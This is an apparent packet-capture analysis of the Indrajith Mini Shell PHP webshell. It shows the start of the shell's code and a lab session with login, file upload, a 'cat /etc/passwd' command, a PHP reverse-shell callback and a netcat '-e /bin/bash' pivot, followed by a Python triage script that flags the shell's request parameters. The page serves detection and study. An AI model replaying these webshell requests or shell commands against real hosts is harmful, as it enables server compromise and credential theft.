

Indrajith Mini Shell v.2.0 Traffic Analysis Python Reverse Shell Pivot Netcat Shell PCAP file download webshell backdoor

Download Attachments

  • 1 pcap minishell
    Date added: January 20, 2017 10:43 am Added by: admin File size: 456 KB Downloads: 114

<?php
/*
* Indrajith Mini Shell v.2.0 with additional features....
* originally scripted by AJITH KP
* (c) Under Gnu General Public Licence 3(c)
* Team Open Fire and Indishell Family
* TOF : Shritam Bhowmick, Null | Void, Alex, Ankit Sharma, John.
* Indishell : ASHELL, D@rkwolf.
* THA : THA RUDE [There is Nothing in Borders]
* Love to : AMSTECK ARTS & SCIENCE COLLEGE, Kalliassery; Vishnu Nath KP, Sreeju, Sooraj, Computer Korner Friends.
*/

/*------------------ LOGIN ------------------*/

$username="admin";
$password="password";
$email="blah@gmail.com";

/*------------------ Login Data End ----------*/

@error_reporting(4);

/*------------------ Anti Crawler ------------*/
if(!empty($_SERVER['HTTP_USER_AGENT']))
{
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT']))
    {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}
echo "<meta name=\"ROBOTS\" content=\"NOINDEX, NOFOLLOW\" />"; //For Ensuring... Fuck all Robots...
/*------------------ End of Anti Crawler -----*/

http://computersecurity.org/images/pcapanalysis/minishell2.png

http://computersecurity.org/images/pcapanalysis/minishell.png

2017-01-20 04:53:39.022938 IP 192.168.1.102.56105 > 192.168.1.100.55555: Flags [P.], seq 703:1131, ack 1011, win 2049, length 428
GET /minishell.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

2017-01-20 04:53:39.023459 IP 192.168.1.100.55555 > 192.168.1.102.56105: Flags [P.], seq 1011:3471, ack 1131, win 254, length 2460
HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 09:53:39 GMT
Server: Apache/2.4.18 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2208
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


2017-01-20 04:53:47.492620 IP 192.168.1.102.56109 > 192.168.1.100.55555: Flags [P.], seq 1:617, ack 1, win 2053, length 616
POST /minishell.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 49
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8

action=login&hide=&usrname=ry4wn&passwrd=password
2017-01-20 04:53:47.492641 IP 192.168.1.100.55555 > 192.168.1.102.56109: Flags [.], ack 617, win 238, length 0
2017-01-20 04:53:47.641385 IP 192.168.1.100.55555 > 192.168.1.102.56109: Flags [P.], seq 1:4840, ack 617, win 238, length 4839
HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 09:53:47 GMT
Server: Apache/2.4.18 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4586
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 04:54:16.709688 IP 192.168.1.102.56114 > 192.168.1.100.55555: Flags [P.], seq 1:665, ack 1, win 2053, length 664
POST /minishell.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 23520
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl1cCBVNLAAiFAzMh
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:54:16.709713 IP 192.168.1.100.55555 > 192.168.1.102.56114: Flags [.], ack 665, win 239, length 0
2017-01-20 04:54:16.744669 IP 192.168.1.102.56114 > 192.168.1.100.55555: Flags [.], seq 665:6505, ack 1, win 2053, length 5840
------WebKitFormBoundaryl1cCBVNLAAiFAzMh
Content-Disposition: form-data; name="path"

/var/www/html
------WebKitFormBoundaryl1cCBVNLAAiFAzMh
Content-Disposition: form-data; name="upload_f"; filename="cerber4.PNG"
Content-Type: image/png

.PNG

2017-01-20 04:54:29.004913 IP 192.168.1.102.56118 > 192.168.1.100.55555: Flags [P.], seq 1:527, ack 1, win 2053, length 526
GET /minishell.php?path=%2Fvar%2Fwww%2Fhtml HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php?
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:54:29.004929 IP 192.168.1.100.55555 > 192.168.1.102.56118: Flags [.], ack 527, win 237, length 0
2017-01-20 04:54:29.006011 IP 192.168.1.100.55555 > 192.168.1.102.56118: Flags [P.], seq 1:4781, ack 527, win 237, length 4780
HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 09:54:29 GMT
Server: Apache/2.4.18 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4527
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 04:55:04.451424 IP 192.168.1.102.56136 > 192.168.1.100.55555: Flags [P.], seq 1:554, ack 1, win 2053, length 553
GET /minishell.php?path=%2Fvar%2Fwww%2Fhtml&cmdexe=cat+%2Fetc%2Fpasswd HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php?
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:55:04.451446 IP 192.168.1.100.55555 > 192.168.1.102.56136: Flags [.], ack 554, win 237, length 0
2017-01-20 04:55:04.454232 IP 192.168.1.100.55555 > 192.168.1.102.56136: Flags [P.], seq 1:4888, ack 554, win 237, length 4887
HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 09:55:04 GMT
Server: Apache/2.4.18 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4634
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 04:56:27.249472 IP 192.168.1.102.56179 > 192.168.1.100.55555: Flags [P.], seq 1:566, ack 1, win 2053, length 565
GET /minishell.php?rev_option=PHP+Reverse+Shell&my_ip=192.168.1.102&my_port=4444 HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php?rs
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:56:27.249487 IP 192.168.1.100.55555 > 192.168.1.102.56179: Flags [.], ack 566, win 237, length 0
2017-01-20 04:56:27.249992 IP 192.168.1.100.39338 > 192.168.1.102.4444: Flags [S], seq 1272629225, win 29200, options [mss 1460,sackOK,TS val 761732068 ecr 0,nop,wscale 7], length 0
2017-01-20 04:56:27.279498 IP 192.168.1.100.55555 > 192.168.1.102.56177: Flags [.], ack 567, win 237, length 0
2017-01-20 04:56:27.753875 IP 192.168.1.102.56174 > 192.168.1.105.62663: Flags [R.], seq 2302, ack 1364, win 0, length 0
2017-01-20 04:56:27.906170 IP 192.168.1.102.56086 > 172.217.5.238.443: Flags [.], seq 0:1, ack 1, win 255, length 1
2017-01-20 04:56:28.150144 IP 192.168.1.102.56087 > 172.217.7.161.443: Flags [.], seq 0:1, ack 1, win 255, length 1
2017-01-20 04:56:28.247493 IP 192.168.1.100.39338 > 192.168.1.102.4444: Flags [S], seq 1272629225, win 29200, options [mss 1460,sackOK,TS val 761732318 ecr 0,nop,wscale 7], length 0
2017-01-20 04:56:28.295154 IP 192.168.1.102.55993 > 74.125.192.188.5228: Flags [.], seq 0:1, ack 1, win 258, length 1
2017-01-20 04:56:28.435666 IP 192.168.1.102.56088 > 172.217.3.46.443: Flags [.], seq 0:1, ack 1, win 256, length 1
2017-01-20 04:56:30.251494 IP 192.168.1.100.39338 > 192.168.1.102.4444: Flags [S], seq 1272629225, win 29200, options [mss 1460,sackOK,TS val 761732819 ecr 0,nop,wscale 7], length 0

2017-01-20 04:56:35.021686 IP 192.168.1.102.56180 > 192.168.1.100.55555: Flags [P.], seq 1:566, ack 1, win 2053, length 565
GET /minishell.php?rev_option=PHP+Reverse+Shell&my_ip=192.168.1.101&my_port=4444 HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php?rs
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:56:35.021703 IP 192.168.1.100.55555 > 192.168.1.102.56180: Flags [.], ack 566, win 237, length 0
2017-01-20 04:56:35.022202 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [S], seq 3778293001, win 29200, options [mss 1460,sackOK,TS val 761734011 ecr 0,nop,wscale 7], length 0
2017-01-20 04:56:35.022902 IP 192.168.1.101.4444 > 192.168.1.100.57978: Flags [S.], seq 1108359154, ack 3778293002, win 14480, options [mss 1460,sackOK,TS val 288241756 ecr 761734011,nop,wscale 6], length 0
2017-01-20 04:56:35.022912 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [.], ack 1, win 229, options [nop,nop,TS val 761734011 ecr 288241756], length 0
2017-01-20 04:56:35.024064 IP 192.168.1.101.4444 > 192.168.1.100.57978: Flags [P.], seq 1:17, ack 1, win 227, options [nop,nop,TS val 288241756 ecr 761734011], length 16
cat /etc/passwd

2017-01-20 04:56:35.024076 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [.], ack 17, win 229, options [nop,nop,TS val 761734012 ecr 288241756], length 0
2017-01-20 04:56:35.024600 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [P.], seq 1:94, ack 17, win 229, options [nop,nop,TS val 761734012 ecr 288241756], length 93
Linux wittyserver 4.3.0-kali1-amd64 #1 SMP Debian 4.3.3-5kali4 (2016-01-13) x86_64 GNU/Linux

2017-01-20 04:57:39.776713 IP 192.168.1.101.4444 > 192.168.1.100.57978: Flags [P.], seq 34:73, ack 4295, win 453, options [nop,nop,TS val 288248231 ecr 761737394], length 39
nc -nv 192.168.1.100 5555 -e /bin/bash

2017-01-20 04:57:39.777076 IP 192.168.1.101.22 > 192.168.1.100.53010: Flags [P.], seq 8009:8049, ack 2960, win 408, options [nop,nop,TS val 288248231 ecr 761750200], length 40
2017-01-20 04:57:39.777085 IP 192.168.1.100.53010 > 192.168.1.101.22: Flags [.], ack 8049, win 1233, options [nop,nop,TS val 761750200 ecr 288248231], length 0
2017-01-20 04:57:39.777528 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [P.], seq 4295:4335, ack 73, win 229, options [nop,nop,TS val 761750200 ecr 288248231], length 40
(UNKNOWN) [192.168.1.100] 5555 (?) open
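The request lines, login body and cookie in the capture are enough for a defender to triage this session. The following Python is an added example, not code from the page or from the shell itself: it parses request lines constructed to mirror the capture, flags the query parameters the capture shows the shell using (cmdexe, rev_option, my_ip, my_port; that indicator list is an assumption limited to what this capture exposes), and confirms that the pass cookie is the MD5 of the password submitted in the login POST.

```python
"""Triage of the Indrajith Mini Shell requests seen in the capture above."""
import hashlib
from urllib.parse import parse_qs, urlsplit

# Request lines, login body and cookie: constructed to mirror the capture.
SAMPLE_REQUESTS = [
    "GET /minishell.php HTTP/1.1",
    "POST /minishell.php HTTP/1.1",
    "GET /minishell.php?path=%2Fvar%2Fwww%2Fhtml HTTP/1.1",
    "GET /minishell.php?path=%2Fvar%2Fwww%2Fhtml&cmdexe=cat+%2Fetc%2Fpasswd HTTP/1.1",
    "GET /minishell.php?rev_option=PHP+Reverse+Shell&my_ip=192.168.1.102&my_port=4444 HTTP/1.1",
]
LOGIN_BODY = "action=login&hide=&usrname=ry4wn&passwrd=password"
COOKIE = "user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99"

# Query parameters the capture shows the shell using. Assumption: the list
# covers only what this capture exposes, not every feature of the shell.
SHELL_PARAMS = {
    "cmdexe": "command execution",
    "rev_option": "reverse shell request",
    "my_ip": "reverse shell callback host",
    "my_port": "reverse shell callback port",
}

def classify_request(request_line):
    """Return indicator strings for one request line; plain page loads give []."""
    _method, target, _version = request_line.split(" ", 2)
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return [f"{meaning}: {name}={params[name][0]}"
            for name, meaning in SHELL_PARAMS.items() if name in params]

def cookie_matches_login(cookie_header, login_body):
    """The shell's 'pass' cookie carries md5(password). Checking it against the
    cleartext 'passwrd' field of the login POST ties the cookie to that login
    and confirms the session used the shell's hard-coded default password."""
    cookies = dict(item.strip().split("=", 1) for item in cookie_header.split(";"))
    password = parse_qs(login_body).get("passwrd", [""])[0]
    return hashlib.md5(password.encode()).hexdigest() == cookies.get("pass")

def triage(requests=SAMPLE_REQUESTS):
    """Map every request line to its indicators, in capture order."""
    return {line: classify_request(line) for line in requests}

if __name__ == "__main__":
    for line, hits in triage().items():
        print(line, "->", hits or "no shell indicator")
    print("cookie is md5 of login password:", cookie_matches_login(COOKIE, LOGIN_BODY))
```

The first three requests (the page load, the login POST and the directory listing) yield no indicator, while the cmdexe request and the reverse-shell request are flagged, which is the distinction a detection rule for this shell needs to draw.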

 
